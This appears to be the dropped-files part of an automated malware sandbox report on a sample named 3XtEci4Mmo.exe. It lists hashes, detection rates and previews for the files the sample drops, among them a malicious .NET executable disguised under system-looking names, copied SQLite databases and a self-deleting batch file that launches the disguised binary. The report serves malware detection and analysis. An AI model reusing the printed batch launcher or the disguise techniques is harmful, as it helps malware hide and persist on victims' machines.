                                                                                        SSDEEP:24:OJQ6tXcZGNLW8nNHACTUt14Wc5D6KDqOzb:OJdDxWYNHddBOKuO/
                                                                                        MD5:967E00A530B451CB2705A41E539ADBC8
                                                                                        SHA1:C50C3EE76588D3DFE5DA18289ED25F75E2662781
                                                                                        SHA-256:E4E6D34E8F582BC0C3A7ED0B5DBD71D921ACA65A6A5B7D6B11C96CC59DDC62A6
                                                                                        SHA-512:5CDADAE2766CF51AF8BFB8FD8657B4B8BD624A82193D181FE82AC32426241567B7139ED7DCC16164FB061EC712C3F62A4A094B924D1E237CAB2AC2279A760AA5
                                                                                        Malicious:false
                                                                                        Preview:wRDOR9rBEtsvDxTSmd30y91FU18KxlHIRAJZx18zyn64YnX9whPuHOAwZ84aAgNclkdCn4fueDCLC7qqd9XQWXACAXAy7iyRZeSyJUV2CePDMztbSN6BJ7FOjbCP3qx5Pvvio2hJneN2H70LoigtmxHbYEOsRG8VrUyaDLxZpxXouNGlk1lVKDTbnUJknz1hg2KxJZIcvGDzacrL8mHaenLnAWxsBMw050I1CScKtIjE9eBKm8lArbC2qhwwmZbiUN3kUzIpK7rWEGngVmFCkvIexQKfgphTrAuvla0x060uuqyk3QbAUY7iFYwDonJeZXpDW254vSMo4XuHckmPOh9SDLqMnxIMxVVWBvNBVgPBLToroplDB3Q1XW9KLtQ7JA0iCXFqWk4rS7Gth9h8LEL4Fd8ovCzmPR2LdFpRj4qa9ijaPQnMLSwEy6diYb5UvScAF5QbTQYRXv4g4iZeZna6fyXglG2I9WprGiVU9L254eqCB7o0Ca4H1ffQhtzNXPSBGNaVNEeNueCAHUfobCGichzkCEwQWphoMp5xhTm75rXXdfJMOLvVJtijXzSJSO1F6XxcZrHIZJmuJcHh5jCK3MfcGWarAdor0RaGsqxgDn59HyZ5svNtMqMu1UVCRaH6e542CAyOvfHQQfVS7e9PP5eJFqOXVvPnf9fL4h3r697ri6dV8DFwb2qibuwWwb29PeuQAJYalRSP8xlJM2ZRqdMmT7uJug5fG7bELMVypoKJjaknJnJ3ClTwRH7DZOpEVxJAVg79hkmBSCC2WGAHXCdfopwDPSZa8FxwRjSmpKWc8RePEE

                                                                                        C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~

                                                                                        C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6e68d43d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.4221440845528391
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
                                                                                        MD5:473C31C4D8009E1338A0611007CE81BB
                                                                                        SHA1:E5B61C125082C7FFA72CFB1BD3E1A4EA4DB9DAEA
                                                                                        SHA-256:2F62C994DE5FBBA7107D6731492694AF9E1C2FF1B154FF8AF1B22ED3687DC559
                                                                                        SHA-512:3BAFA80377B438B2D1493A367C732F80E0509B22C6D8E6B70B43AFEE6FDBD22791351497BD2AEADBE5A80F32A299C76CD7E5B56D1E72A1E9857B7CBE7B7A1902
                                                                                        Malicious:false
                                                                                        Preview:nh.=... .......A.......X\...;...{......................0.!..........{A.$....}s.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................>..$....}......................$....}s..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Recovery\088424020bedd6

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with very long lines (969), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):969
                                                                                        Entropy (8bit):5.889663121891552
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:xr7VUC6V0bFX7URF2O5WbIecN1X6KBAU9z:xrBUjatI1X/5z
                                                                                        MD5:19BFFF98353E363832CC121CACCD1297
                                                                                        SHA1:4A78D8069E3613FFEC9EC9FF7BF28AEBB775860D
                                                                                        SHA-256:06749A1E9CE524BB6520C01F53C63AB4EFEDA451380368B167C4B51D80CE7A91
                                                                                        SHA-512:5A83CFDBEFFB7160D7E52FF44B1BC938B593E764B0387D93CE2551F9A2DB2BBC0C9004DB64ADEFC32B1D12C2A88FB4F8320233129269CCAEF0450738389597FE
                                                                                        Malicious:false
                                                                                        Preview:y67fuCNFWlDhnCYo0HDdhBWxeZVHuH1OylB4iGDFdhXJ815cZjqbNUaxkKAVqFUOtzsCBdFuD79AnNynd2rLbaAeKNUYFsZYMIZII3a6e6XQUaJXVX2xYJxSzO2yIqpVilxexpfkbvqfCtJtD7Dr0l9CVGT4AmxxQCrtmpjq1SVndSQFEIuLn7e6lvJqVkjz82OACaGYYW0iQWjD0O012lKThuH1f2URsgokDQDoCWxQH6qPMG0Hus7Wr4cRSP2fCiztr89kLLzfy3MkD2pZBNgAjS2JxvWxdROiH7hNHQ6i2bhys1NZjddyCzKZF0wZzCCgpodGVcSvQ7HHuEa5i6N9yZfSwIHRdht0ZBIEYGEHLsiErCoBZ003yCsPIKUNUBRtOQst5Whc2GyF1aktdG1nqzCWS36Nw0xKay0aU4FCTYAsNmYrkktNJoDYOVbCaUpBSopCkJZiByTSyUJpeOnLHkAvvbM8dCm9s9Zj6VHaLKLUUuk3MvhLqd3sn4RI6aF9MUjz4jsJHMA7YqaA1SwseaSPFq5CD8dvFMHALv9mCYEdd6U6eQRonXewCTtOoqFJtP2LiayGTJpGVyvJW8hwqzHrsV71Bv8WS5uOEJYEcLUdrYaOhj1pJSc4HKdNc6EiLTxaEhFNkdUffn9U4tTc3TM9dzG3pKlfGvSYkAJAeoEq86ZdKIStmmp2Gy6OaLha1zYtVlt4jT7OPgBgansg122eGaSvD5jTHnyJhqIjZYJToamjxZxxcAi864m5S70otoGlr19ueJHdtjzqxs8nHw0HE0MnDMRbhejATB15aCST2FPWE6Ij9Nh7x9g1pVqS2q5OAyWv1DMEdhO9kzjHErbU7lNUe9QFVAaLKBWPjWs5AcePuhRzwjNKOlQYlCR1xHsdGCyjdTis8gTfH8j6saSwwQ6iu8ohE1H2tAIstsVdAfMsRvQmdVIWz6q0FPyfoBnHY

                                                                                        C:\Recovery\conhost.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3823616
                                                                                        Entropy (8bit):7.833671064349166
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:g2Bl6PH1SpUiDnkFcbxHgsHZ5QXZQjS4CTWixanZ4+PLXxyaBGE:gqlofir0cb9gsHZypQu47ixanZ4KLXTg
                                                                                        MD5:529B29E8BCEF9CC790F7C61F40D44B39
                                                                                        SHA1:094A6C81F7A116D2099790DE3E7CD6449F1BB834
                                                                                        SHA-256:A9249873D68391DCDD604B5332C1F3EE1BE4303FF5BA8E83147FBAB20F87DE88
                                                                                        SHA-512:240D6DE89491ACC5229AFAC34579FE9A1D159D39A9DEDA72EAAF3BA73C31B45BE04E598CBFE31CA38817832E0208ADF8F3E5A7A59A56AF642A5B602748A431AC
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................P:..........o:.. ....:...@.. ........................:...........@.................................po:.K.....:.p.....................:...................................................... ............... ..H............text....O:.. ...P:................. ..`.rsrc...p.....:......R:.............@....reloc........:......V:.............@..B.................o:.....H.......4..........j......../..n:......................................0..........(.... ........8........E................9...8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{f...:....& ....8........0..)....... ........8........E........k...............*...8.......... ....~....{....:....& ....8........~....(@...~....(D... ....?S... ....~....{z...:....& ....8x...~....9.... ....~....{....9Z...& ....8O...r...ps....z*8.... ....~....{c...:*...& ....8....~

                                                                                        C:\Recovery\conhost.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:false
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3XtEci4Mmo.exe.log

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1915
                                                                                        Entropy (8bit):5.363869398054153
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                        MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                        SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                        SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                        SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TezdDRgSgyeGDKRkzk.exe.log

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1456
                                                                                        Entropy (8bit):5.362485656371469
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KjJE4VE4j:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIW
                                                                                        MD5:8754EE8606838243DB62D2041DB5B769
                                                                                        SHA1:09BEF02C7C76A250EEEC032792EF7F74961E66DA
                                                                                        SHA-256:5C95958D140BE11D69653A043D69DF7E4568C7D3EC511D5C206BE7C66F74BD13
                                                                                        SHA-512:FAF12AFEEFE5C253903DF150D347B03F217391B344D6DE7D67C73B76FB7F5F370554AD13ADD8FDE9060CB1304DA21271D0B66F53468EE6B70EF6F98D2F937C0E
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                        Download File
                                                                                        Process:C:\Recovery\conhost.exe
                                                                                        File Type:CSV text
                                                                                        Category:dropped
                                                                                        Size (bytes):847
                                                                                        Entropy (8bit):5.354334472896228
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                        MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                        SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                        SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                        SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                        Malicious:false
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):19253
                                                                                        Entropy (8bit):5.005753878328145
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                        MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                        SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                        SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                        SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:modified
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.34726597513537405
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlll:Nll
                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................

                                                                                        C:\Users\user\AppData\Local\Temp\2zH73PFp52

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):25
                                                                                        Entropy (8bit):4.323856189774724
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:DMSQdf1Wn:Cdf1W
                                                                                        MD5:5346CBA842B23322B403F425945D6C55
                                                                                        SHA1:9F481FA725D2E38CB4CF35D93EF25EDD6129B4FD
                                                                                        SHA-256:6E18CF28007568BCA764C2697E88518274B2BA3AA1E442415C548AAD9B1F124F
                                                                                        SHA-512:AC46F88E0F2E566BB10FAC2E28919F5FBD58036AC42DE395F6E7ECC2D150432996A8AF0F2CBD6119CA7E42A381CF0944C53D02004DA380148A9DA6E868FE4747
                                                                                        Malicious:false
                                                                                        Preview:CRDOidfxeyy5uTqZ1nQhq9doh

                                                                                        C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\3XtEci4Mmo.exe
                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):179
                                                                                        Entropy (8bit):5.43703237979197
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVB08iQx6BXULsBktKcKZG1t+kiE2J5xAIYP7dqK:hCRLuVFOOr+DEE8iRBXULsKOZG1wkn2q
                                                                                        MD5:3308516292EB170D70419DBD85DED61C
                                                                                        SHA1:A26D5A0869094A8BBCF4D784B2ABC2A625A4CAA7
                                                                                        SHA-256:115AE8A00EEE88DB65298D0D4B6E3BCE63DF377B0917D8131A23553144C1175E
                                                                                        SHA-512:DB68A1011A7749F5B7D3F66E65AFACF2DEEFC2CA43833B90504D1DBBD44DDD34E3F92FFDBBDD4CCDBF955A37F51DA8B81CACB01A7DD994C700257AEA2AF5881A
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BO7Y63UfdW.bat"

                                                                                        C:\Users\user\AppData\Local\Temp\HUAq57gMuH

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):114688
                                                                                        Entropy (8bit):0.9746603542602881
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\L3tiN4cQkk

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5707520969659783
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\LIe3rNHC8w

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):98304
                                                                                        Entropy (8bit):0.08235737944063153
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\LqAiWnhoKd

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):20480
                                                                                        Entropy (8bit):0.5707520969659783
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\LwS2Gv7TDl

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                        Category:dropped
                                                                                        Size (bytes):106496
                                                                                        Entropy (8bit):1.1358696453229276
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
